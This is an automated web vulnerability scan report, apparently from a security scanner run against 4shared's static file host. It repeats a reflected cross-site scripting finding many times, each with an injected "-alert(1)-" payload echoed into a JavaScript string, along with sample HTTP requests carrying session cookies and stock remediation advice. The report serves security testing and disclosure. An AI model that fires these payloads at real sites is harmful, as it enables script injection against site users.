The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c1c"-alert(1)-"a0a1c09ce47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedb ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9db94"-alert(1)-"6dac60dedfd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7aec"-alert(1)-"b86c9662edb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() {
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad02c"-alert(1)-"a953950d00e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 760a5"-alert(1)-"158d4163382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedba ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73080"-alert(1)-"bd5e5c0b567 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b306f"-alert(1)-"f931fa8a6ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() {
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34543"-alert(1)-"e3036abd11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d12c3"-alert(1)-"47c5b2bb8a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedb ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2cc"-alert(1)-"2ebb09db008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87a8"-alert(1)-"2d8bde7f418 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() {
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a755"-alert(1)-"4ac0d6a008 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f14c"-alert(1)-"566c054463f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images3f14c"-alert(1)-"566c054463f/ipic.jpg"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() {
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b4f"-alert(1)-"94dac4f1560 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/images/ipic.jpg20b4f"-alert(1)-"94dac4f1560"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79778"-alert(1)-"1c264739c21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf87f"-alert(1)-"6f121a1eda2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a920"-alert(1)-"365bd27b3c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27f2c"-alert(1)-"68c4ab76dbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9a31"-alert(1)-"63ff542d0f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc2d"-alert(1)-"2c2ee3eca79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77c70"-alert(1)-"b6cb32f2907 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0dfe"-alert(1)-"82ae5dcc5d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb9c5"-alert(1)-"97dd4e6f4ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93e21"-alert(1)-"78ca177c741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js/index.js93e21"-alert(1)-"78ca177c741"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e7d"-alert(1)-"6b8c1a3bc02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2749"-alert(1)-"ee01858fec6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcd0d"-alert(1)-"c510e79c899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js?ver=1611 HTTP/1.1 Host: static.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";
Response
HTTP/1.1 404 /jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=1B8B1596CCAE89B1C7DAED6AB2D79C1E.dc293; Path=/ Content-Type: text/html;charset=UTF-8 Date: Wed, 23 Feb 2011 23:08:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() {
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbfde"-alert(1)-"8729de527e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/login_fnc.jsdbfde"-alert(1)-"8729de527e7?ver=1611 HTTP/1.1 Host: static.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";
Response
HTTP/1.1 404 /js/login_fnc.jsdbfde"-alert(1)-"8729de527e7 Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4B8B80CCAEE7DF3FF35B41734250E503.dc293; Path=/ Content-Type: text/html;charset=UTF-8 Date: Wed, 23 Feb 2011 23:08:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js/login_fnc.jsdbfde"-alert(1)-"8729de527e7"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b36e"-alert(1)-"a65e025b9c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function fe ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938f0"-alert(1)-"0ba47aec0e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e541a"-alert(1)-"0f1b43c7c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://static.4shared.com/js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1f89"-alert(1)-"d8bdea6d6a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 871d8"-alert(1)-"3e7896575aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
